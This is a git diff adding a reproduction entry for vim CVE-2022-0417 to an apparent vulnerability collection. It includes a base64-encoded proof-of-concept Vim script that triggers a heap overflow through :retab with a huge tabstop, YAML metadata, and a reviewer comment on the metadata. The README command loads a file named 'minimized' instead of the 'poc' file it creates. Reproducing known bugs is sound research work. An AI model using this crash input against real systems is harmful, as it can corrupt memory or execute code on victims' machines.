diff --git a/cve/vim/2022/CVE-2022-0417/README.md b/cve/vim/2022/CVE-2022-0417/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..100782435597146a6747e18c99476d4f653c306b
--- /dev/null
+++ b/cve/vim/2022/CVE-2022-0417/README.md
@@ -0,0 +1,8 @@
+### 漏洞复现
+```shell
+$ echo -ne "bm9ybTBvMDAwMDAwMDAwMDAwMDAwMDAwMDD/MJMwMDAKc2lsIW5vcm0WYxwwMAkwCmZ1IFJldGFi
+KGcsbikKZXhlInJldCJhOm4KZW5kZgpjYWwgbCgiIixSZXRhYigwLDMpCnNlIHRhYnN0b3A9NTUw
+MDAwMDAwMApjYWwgbCgiIixSZXRhYigwLDAp" | base64 -d > poc
+$ vim -u NONE -i NONE -n -X -Z -e -m -s -S minimized -c ":qa!"
+```
+![](./png/CVE-2022-0417.png)
\ No newline at end of file
diff --git a/cve/vim/2022/CVE-2022-0417/png/CVE-2022-0417.png b/cve/vim/2022/CVE-2022-0417/png/CVE-2022-0417.png
new file mode 100644
index 0000000000000000000000000000000000000000..c96750af334489a09b6c5bdf8deb3444c6892f16
Binary files /dev/null and b/cve/vim/2022/CVE-2022-0417/png/CVE-2022-0417.png differ
diff --git a/cve/vim/2022/CVE-2022-0417/poc b/cve/vim/2022/CVE-2022-0417/poc
new file mode 100644
index 0000000000000000000000000000000000000000..ce01ce153b1fd6339d3d8db9c1a4401b2fd8c5c2
--- /dev/null
+++ b/cve/vim/2022/CVE-2022-0417/poc
@@ -0,0 +1,8 @@
+norm0o000000000000000000000000
+sil!normc00 0
+fu Retab(g,n)
+exe"ret"a:n
+endf
+cal l("",Retab(0,3)
+se tabstop=5500000000
+cal l("",Retab(0,0)
\ No newline at end of file
diff --git a/cve/vim/2022/yaml/CVE-2022-0417.yaml b/cve/vim/2022/yaml/CVE-2022-0417.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..30adb1b706450e3f12fa96b46a13062ae2e4bbb8
--- /dev/null
+++ b/cve/vim/2022/yaml/CVE-2022-0417.yaml
@@ -0,0 +1,20 @@
+id: CVE-2022-0417
+source: https://huntr.dev/bounties/fc86bc8d-c866-4ade-8b7f-e49cec306d1a/
+info:
+ name: Vim是一款基于UNIX平台的编辑器。
+ severity: high
+ description: |
+ vim存在安全漏洞,该漏洞源于这个漏洞允许攻击者可利用该漏洞输入一个特别制作的文件,导致崩溃或代码执行。
+ scope-of-influence:
+ vim < 8.2.4245
+ reference:
+ - https://github.com/vim/vim/commit/652dee448618589de5528a9e9a36995803f5557a
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0417
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2022-0417
+ cwe-id: CWE-787,CWE-122
+ cnvd-id: None
+ kve-id: None
+ tags: 崩溃,代码执行,cve2022
\ No newline at end of file
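Review bot: `info.name` holds a sentence describing the product (`Vim是一款基于UNIX平台的编辑器。`) rather than a title for the vulnerability, so anyone triaging from this record has to open the references to learn what it is. A title that follows the `cwe-id` already listed, such as `name: Vim 堆缓冲区溢出漏洞`, would be clearer. The `description` also reads as a garbled sentence ("该漏洞源于这个漏洞允许…") and never names the triggering operation; judging from the poc file in this commit it appears to be `:retab` with an oversized 'tabstop', which is worth confirming against the referenced commit before adding it. Since `scope-of-influence` already gives `vim < 8.2.4245`, the description should state the remediation explicitly: upgrade to 8.2.4245 or later. Separately, `cnvd-id: None` and `kve-id: None` load as the string "None" in YAML rather than as an empty value; if any consumer checks these fields for absence, `null` is safer, unless the repository's schema mandates the literal.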